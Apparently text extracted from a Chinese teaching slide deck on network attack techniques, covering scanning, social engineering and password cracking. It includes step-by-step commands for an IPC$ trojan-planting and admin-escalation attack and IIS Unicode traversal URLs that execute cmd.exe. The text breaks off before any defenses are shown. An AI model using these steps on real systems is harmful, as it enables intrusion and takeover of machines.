网络常见攻击技术及防御措施.pptVIP

计算机网络攻防技术 直奔主题 完整的攻击行为 踩点(信息收集) 入侵 留后门 抹去痕迹 防范技术 针对以上提到的攻击行为提出防范措施 攻击前奏－ 踩点 踩点的目的 获取对方大概信息 主机信息 是否存在漏洞 密码脆弱性等等 指导下一步攻击行为 踩点的方式 专用漏洞扫描工具 正式渠道：媒体（如搜索引擎、广告介绍等） 社会工程学 信息收集－探测扫描 – (1) 扫描是“一切入侵的基础” 获取对方操作系统信息 获取对方主机开放服务信息 获知对方可能存在的漏洞 获取对方主机用户列表 常用扫描工具 漏洞扫描工具 nessus、X-scanner、ISS、Retina 探测扫描工具 nmap、supperscan 信息收集 - 探测扫描 – (2) 国产优秀漏洞扫描器 – X-scanner 扫描报告示例 信息收集- 探测扫描 – (3) 漏洞扫描利器 – nessus 扫描报告示例 信息收集- 探测扫描 – (4) 极好的探测工具 - nmap 信息收集-正式渠道（媒体） 网站信息 举例：某网络提供商在其网站上宣传 “特惠服务器租用：RedHat Linux 8.0 支持MY SQL/PHP 采用性能优异的Apache 1.3.XX Web服务器” 搜索引擎 Google搜索 例：某Web服务器存在致命错误脚本“5sf67.jsp” 攻击者可通过搜索引擎查找存在该错误脚本的网站 入侵行为- 社会工程学 真实案例一 一位安全专家只花了几个小时就完全控制了一家大公司的网络，他所需要作的仅仅是打了几个电话，他是如何作到？ 真实案例二 凯文.米特尼克最擅长的是什么？ 真实案例三 一个大公司的网管犯的错误？ 入侵行为– 口令破解 电子邮件口令破解 Pop3信箱口令暴力破解 网页表单破解 同样属暴力破解，单位时间内重复提交表单，比较返回结果 WindowNT用户口令破解 典型工具：l0pht的nt口令破解工具 *号密码查看 简单编程实现 联众、QQ密码窃取 重画登陆窗口 入侵行为－口令攻击示意 入侵行为– 口令破解工具 工具举例 入侵行为-拒绝服务攻击 入侵行为- 利用系统漏洞( IPC$) IPC$是什么 ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 前提 例如：使用X-scanner扫描到某Win2K主机允许空连接，且共享IPC$，管理员administrator口令为password 目的 在目标主机上运行木马程序以完全控制该主机 入侵实例 – IPC$ 攻击步骤 建立连接 C:\net use \\\IPC$ /user:admintitrator 拷贝木马服务器端 C:\copy srv.exe \\\admin$ 查看对方时间 C:\net time \\ 定时启动木马服务器端 C:\at \\ 11:05 srv.exe 连接木马 新建用户hacker C:\ net user guest /active:yes 将用户加入管理员组 C:\net localgroup administrators guest /add  入侵行为-利用服务漏洞(UNICODE) UNICODE漏洞介绍 微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令 当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件 漏洞利用 如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容： 7/scripts/../../winnt/system32/cmd.exe?/c+dir 利用这个漏洞查看系统文件内容也是可能的： /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini 入侵行为- UNICODE攻击 攻击步骤 拷贝cmd.exe至scripts目录 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe 写入ftp批处理文件